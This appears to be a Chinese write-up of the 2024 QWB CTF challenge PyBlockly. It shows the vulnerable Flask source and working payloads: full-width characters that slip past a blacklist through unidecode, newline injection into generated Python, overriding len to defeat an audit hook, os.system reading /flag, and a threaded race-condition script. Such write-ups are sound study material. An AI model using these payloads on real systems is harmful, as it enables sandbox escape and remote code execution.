强网杯 2024 PyBlockly
#全角符号绕过黑名单 #compile函数 #直接拼接,我们可以进行换行rce #unidecode》unidecode全角转半角绕过黑名单
题目的源码如下:
源码
from flask import Flask, request, jsonify
import re
import unidecode
import string
import ast
import sys
import os
import subprocess
import importlib.util
import jsonapp = Flask(__name__)
#flask 自动对json的\u形式的unciode自动解码
app.config['JSON_AS_ASCII'] = Falseblacklist_pattern = r"[!\"#$%&'()*+,-./:;<=>?@[\\\]^_`{|}~]"def module_exists(module_name):spec = importlib.util.find_spec(module_name) #在这段代码中是用于辅助判断一个模块是否存在以及是否是标准库或内置模块的关键工具,从而实现对模块存在的检查逻辑。 这是一个非常有用的函数,用于检查模块是否存在以及获取模块的详细信息。,用于查找指定模块的规范(specification)。 如果模块存在,它会返回一个 ModuleSpec 对象,否则返回 None。if spec is None:return Falseif module_name in sys.builtin_module_names:return True
#- spec.origin 是一个字符串,表示模块的文件路径。如果模块是一个内置模块(如 sys),spec.origin 为 None;如果模块是一个文件(如标准库模块或用户自定义模块),spec.origin 会是一个文件路径。if spec.origin:std_lib_path = os.path.dirname(os.__file__)if spec.origin.startswith(std_lib_path) and not spec.origin.startswith(os.getcwd()):return Truereturn Falsedef verify_secure(m):for node in ast.walk(m):match type(node):case ast.Import: print("ERROR: Banned module ")return Falsecase ast.ImportFrom: print(f"ERROR: Banned module {node.module}")return Falsereturn True
#这段代码的作用是检查代码的 AST 中是否存在不被允许的模块导入语句。如果发现任何 import 或 from ... import ... 语句,函数会返回 False,并打印相应的错误信息
def check_for_blacklisted_symbols(input_text):if re.search(blacklist_pattern, input_text):return Trueelse:return Falsedef block_to_python(block):block_type = block['type']code = ''if block_type == 'print':text_block = block['inputs']['TEXT']['block']text = block_to_python(text_block) code = f"print({text})"elif block_type == 'math_number':if str(block['fields']['NUM']).isdigit(): code = int(block['fields']['NUM']) else:code = ''#检查text的非法字符elif block_type == 'text':if check_for_blacklisted_symbols(block['fields']['TEXT']):code = ''else:#unicode编码绕过code = "'" + unidecode.unidecode(block['fields']['TEXT']) + "'"print(code)elif block_type == 'max':a_block = block['inputs']['A']['block']b_block = block['inputs']['B']['block']a = block_to_python(a_block) b = block_to_python(b_block)code = f"max({a}, {b})"elif block_type == 'min':a_block = block['inputs']['A']['block']b_block = block['inputs']['B']['block']a = block_to_python(a_block)b = block_to_python(b_block)code = f"min({a}, {b})"if 'next' in block:block = block['next']['block']code +="\n" + block_to_python(block)+ "\n"else:return code return codedef json_to_python(blockly_data):block = blockly_data['blocks']['blocks'][0]python_code = ""python_code += block_to_python(block) + "\n"return python_codedef do(source_code):hook_code = '''
def my_audit_hook(event_name, arg):blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]if len(event_name) > 4:raise RuntimeError("Too Long!")for bad in blacklist:if bad in event_name:raise RuntimeError("No!")__import__('sys').addaudithook(my_audit_hook)'''print(source_code)code = hook_code + source_codetree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST) #用于将源代码字符串动态编译为可执行的代码对象try:if verify_secure(tree): with open("run.py", 'w') as f:f.write(code) result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8")os.remove('run.py')return resultelse:return "Execution aborted due to security concerns."except:os.remove('run.py')return "Timeout!"@app.route('/')
def index():return app.send_static_file('index.html')@app.route('/blockly_json', methods=['POST'])
def blockly_json():blockly_data = request.get_data()print(type(blockly_data))blockly_data = json.loads(blockly_data.decode('utf-8'))print(blockly_data)try:python_code = json_to_python(blockly_data)return do(python_code)except Exception as e:return jsonify({"error": "Error generating Python code", "details": str(e)})if __name__ == '__main__':app.run(host = '0.0.0.0')
__import__
可以导入模块,重写len函数来绕过第一层,os.system可以绕过第二层
def my_audit_hook(event_name, arg):blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]print(len(event_name), event_name)if len(event_name) > 4:raise RuntimeError("Too Long!")print(event_name)for bad in blacklist:if bad in event_name:raise RuntimeError("No!")__import__('sys').addaudithook(my_audit_hook)def aa(a):return 1
__builtins__.__dict__['len']=aa__import__('os').system('ls')
因为/flag只有root可以读,所以我们去/bin目录下找有suid位的命令,发现dd可以读flag
block_to_python 函数
block_to_python
函数详解
block_to_python
是 Blockly JSON 到 Python 转换的核心函数,它递归解析 Blockly 的 JSON 结构并生成 Python 代码。以下是逐部分解析:
函数定义与基础结构
def block_to_python(block):block_type = block['type']code = ''
- 输入:单个 Blockly 块(JSON 对象)
- 输出:生成的 Python 代码字符串
- 处理流程:
- 提取块的
type
字段确定块类型 - 根据类型进行针对性处理
- 提取块的
支持块类型解析
1. print
块(打印语句)
if block_type == 'print':text_block = block['inputs']['TEXT']['block']text = block_to_python(text_block) # 递归解析文本块code = f"print({text})"
- 结构:
{"type": "print","inputs": {"TEXT": {"block": { /* 嵌套块 */ }}} }
- 转换:
print(递归生成的文本)
- 示例:
print('Hello')
2. math_number
块(数字常量)
elif block_type == 'math_number':if str(block['fields']['NUM']).isdigit():code = int(block['fields']['NUM']) # 纯数字直接转换else:code = '' # 非数字返回空(安全措施)
- 结构:
{ "type": "math_number", "fields": {"NUM": "123"} }
- 限制:仅接受纯数字(
1e5
等会被过滤) - 输出:
123
(整数类型)
3. text
块(字符串)
elif block_type == 'text':if check_for_blacklisted_symbols(block['fields']['TEXT']):code = '' # 含特殊符号返回空else:code = "'" + unidecode.unidecode(block['fields']['TEXT']) + "'"
- 安全过滤:
- 使用
check_for_blacklisted_symbols
检测标点符号(!@#$%^&*
等) - 通过
unidecode
转换非 ASCII 字符(如中文
→zhong wen
)
- 使用
- 输出:
'Hello'
(带引号的字符串)
4. max/min
块(最大值/最小值)
elif block_type == 'max':a_block = block['inputs']['A']['block']b_block = block['inputs']['B']['block']a = block_to_python(a_block) # 递归解析Ab = block_to_python(b_block) # 递归解析Bcode = f"max({a}, {b})"
- 结构:
{"type": "max","inputs": {"A": {"block": { /* 嵌套块 */ }},"B": {"block": { /* 嵌套块 */ }}} }
- 输出:
max(1, 2)
链式块处理
if 'next' in block: # 检测是否存在后续块next_block = block['next']['block']code += "\n" + block_to_python(next_block) + "\n" # 递归处理
return code
- 链式结构示例:
{"type": "print","inputs": { ... },"next": {"block": {"type": "print","inputs": { ... }}} }
- 输出:
print('First') print('Second')
递归机制解析
函数采用深度优先递归:
- 遇到嵌套块(如
print
中的文本)→ 递归解析 - 遇到链式块(
next
字段)→ 递归解析后续块 - 最终拼接所有结果
示例递归路径:
print块→ 解析text块→ 检查字段安全→ 生成'Hello'→ 生成 print('Hello')→ 发现next块(print)→ 递归处理下一个print块
安全机制
- 数字块:
math_number
仅接受纯数字 - 文本块:
- 标点符号黑名单过滤(
blacklist_pattern
) - Unicode 降级(
unidecode
)
- 标点符号黑名单过滤(
- 错误处理:
- 非法输入返回空字符串(可能造成
print()
空输出) - 链式块中断不影响后续解析
- 非法输入返回空字符串(可能造成
典型输入/输出
输入 JSON:
{"type": "print","inputs": {"TEXT": {"block": {"type": "text","fields": {"TEXT": "Hello"}}}},"next": {"block": {"type": "max","inputs": {"A": {"block": {"type": "math_number", "fields": {"NUM": "1"}}},"B": {"block": {"type": "math_number", "fields": {"NUM": "2"}}}}}}
}
输出 Python:
print('Hello')
max(1, 2)
限制与注意事项
- 类型混合问题:
max('a', 1)
会运行时出错 - 空块处理:被过滤的块(如含标点的文本)会导致
print()
无输出 - 链式表达式:
max(1,2)
后接print
是合法但无意义的 - 错误传播:单个块失败不影响链式块继续解析
该函数通过递归和严格过滤实现了 Blockly 到 Python 的安全转换,核心设计围绕防御性编程展开。
解题思路
思路还是比较清晰的,这道题需要我们利用json传入的block进行python代码的执行 ,
if block_type == 'print':text_block = block['inputs']['TEXT']['block']text = block_to_python(text_block) code = f"print({text})"
在print 块中,它是直接进行拼接的,我们可以进行闭合换行,
比如:
传入a')\nprint("yzyz")#
,经过拼接之后就变成了:
print('a')
print("yzyz")#')
就会回显a
和Infernity
。我们再把特殊字符找到它最相似的字符:比如(
换成⁽
,#
换成﹟
。
a'⁾\nprint⁽"Infernity"⁾﹟
所以,我们利用闭合与换行,就能执行任意代码了
@app.route('/blockly_json', methods=['POST'])
def blockly_json():blockly_data = request.get_data()print(type(blockly_data))blockly_data = json.loads(blockly_data.decode('utf-8'))print(blockly_data)try:python_code = json_to_python(blockly_data)return do(python_code)except Exception as e:return jsonify({"error": "Error generating Python code", "details": str(e)})
post 传参,
绕过黑名单检测
先对我们传 text 会有一个黑名单检测 (
blacklist_pattern = r"[!\"#$%&'()*+,-./:;<=>?@[\\\]^_`{|}~]" #过滤的非常多字符,绕过比较难编码或者特殊字符构造很难绕过
,但我们的代码必须要写在这里 ),但天无绝人之路,它有一个 unidecode.unidecode
这个方法可以用来解析特殊字符和函数,然后可以把全角字符转换为半角正常识别,所以这里可以使用全角字符先绕过黑名单,然后进行解码转为正常代码进行恶意代码执行
- ! 而 黑名单检测在转换之前,所以我们可以利用全角转半角进行绕过
我们json传参全角符号绕过blacklist_pattern
https://zh.wikipedia.org/wiki/%E5%85%A8%E5%BD%A2%E5%92%8C%E5%8D%8A%E5%BD%A2
使用文中全角符号,中文字符通过 unicode.unicode 可以直接转英文字符,即绕过黑名单
半角转全角字符脚本
text = "" print(text.replace('_','_').replace('(','⁽').replace(')','⁾').replace('\'',''').replace('#','﹟').replace('[','[').replace(']',']').replace('=','⁼').replace('"','"').replace('.','․').replace(':',':').replace('/','/').replace('-','-').replace('>','﹥'))
语法检测与审计钩子函数绕过
然后,我们上面传入的text经处理后teturn的结果进入do函数
在这里与 audit hook 一起被[[compile()]] 动态编译为可执行的代码对象 ,之后 会用 verify_secure 函数进行ast 语法检测 ,不能动用import直接导入模块 ,对于 这里的 审计钩子函数 我们利用[[PyJail绕Audit Hook]] 篡改 len 函数
通过获取builtins
模块,把len函数的返回值替换为固定值,不超过他这个4就行了
然后第二层。os与system都不在黑名单里。我们可以用 os.system
poc大致长这样
{"blocks": {"blocks": [{"type": "print","id": "print1","inputs": {"TEXT": {"block": {"type": "text","id": "text1","fields": {"TEXT": "s"')\n 代码 \n#"}}}}}]}
}
方法一
len是一个内置函数,我们就可以通过__builtins__
覆盖len函数绕过长度检验
globals()['__builtins__'].len=lambda x: 1
获取 builtins
模块 的方法有很多,还可以
__import__("builtins").len=lambda x:0
虽然import被禁用了,但是动态的导入__import__
却可以绕过ast
然后便可以命令执行
payload1
globals() 获取builtins
模块
’)\nglobals()[‘__builtins__’].len=lambda x: 1\n__import__(‘os’).system(‘dd if=/flag’)\n(‘
这里是需要提权的,但不多说
[[GTFOBins]]
payload2
{"blocks": {"blocks": [{"type": "print","id": "print1","inputs": {"TEXT": {"block": {"type": "text","id": "text1","fields": {"TEXT": "s"')\n__builtins__.len = lambda x: 3\n[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("dd if=/flag")\n#"}}}}}]}
}
payload3
照抄SSTIpayload
[[ssti绕过的payload大全]]
a'⁾#\n__builtins__․len ⁼ lambda x:1\n\n[ x․__init__․__globals__ for x in ''․__class__․__base__․__subclasses__⁽⁾ if x․__name__⁼⁼"_wrap_close"][0]["system"]⁽"ls /-al"⁾#
payload4
直接利用__import__ 获取builtins
模块 import 导入os
{"blocks":{"languageVersion":0,"blocks":[{"type":"text","id":"~PG?ga`45hw$)473HrT8","fields":{"TEXT":"';__import__("builtins").len=lambda x:0;print(__import__("os").system("ls"));'"}}]}}
方法二
#条件竞争
这个方法直接使用了PyJail覆篡改内置函数操作绕Audit Hook-先知社区 (aliyun.com) 的内容
由于沙箱没有随机文件名并且审计事件中并不包含write,导致每个都是执行一个py文件,可以多线程第一个覆盖,第二个执行run.py
但是我们需要考虑waf绕过,通过本地调试发现审计事件触发的是open
刚好4个长度也绕过了命令执行
from flask import Flask, request, jsonify
import re
import ast
import os
import subprocessdef do():hook_code = '''
def my_audit_hook(event_name, arg):blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]print(event_name)if len(event_name) > 4:raise RuntimeError("Too Long!")for bad in blacklist:if bad in event_name:raise RuntimeError("No!")__import__('sys').addaudithook(my_audit_hook)
(open(bytes.fromhex('72756e2e7079').decode(),'wb').write(bytes.fromhex('696d706f7274206f730a0a7072696e74286f732e706f70656e282764642069663d2f666c616727292e72656164282929')))'''tree = compile(hook_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)try:with open("run.py", 'w') as f:f.write( hook_code) result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8")print(result)return resultexcept:os.remove('run.py')return "Timeout!"do()
code传入写文件代码这样即可覆盖run.py
(open(bytes.fromhex('72756e2e7079').decode(),'wb').write(bytes.fromhex('696d706f7274206f730a0a7072696e74286f732e706f70656e282764642069663d2f666c616727292e72656164282929')))
hex内容如下
import osprint(os.popen('dd if=/flag').read())
- @ 编码是为了绕过第二层的黑名单
条件竞争脚本如下
import requests
import json
import threadingurl = "http://eci-2zedptpxwuwj344tkegy.cloudeci1.ichunqiu.com:5000"data = {"blocks": {"blocks": [{"type": "print","x": 101,"y": 102,"inputs": {"TEXT": {"block": {"type": "max","inputs": {"A": {"block": {"type": "text","fields": {"TEXT": "‘,‘’))\n(open(bytes。fromhex(’72756e2e7079‘)。decode(),’wb‘)。write(bytes。fromhex(’696d706f7274206f730a0a7072696e74286f732e706f70656e282764642069663d2f666c616727292e72656164282929‘)))\n\nprint(print(’1"}}},"B": {"block": {"type": "math_number","fields": {"NUM": 10}}}}}}}}]}
}def send_request():while True:r = requests.post(url + "/blockly_json",headers={"Content-Type": "application/json"}, data=json.dumps(data))text = r.textif "1 10" not in text and "No such file or direct" not in text and len(text) > 10:print(text)os.exit(-1)breakthreads = []
num_threads = 100for _ in range(num_threads):thread = threading.Thread(target=send_request)threads.append(thread)thread.start()for thread in threads:thread.join()
参考文章
PyJail覆篡改内置函数操作绕Audit Hook-先知社区 (aliyun.com)
强网杯2024 Writeup - 星盟安全团队 (xmcve.com)
强网杯2024 - Infernity’s Blog
A1natas 2024 强网杯 WriteUp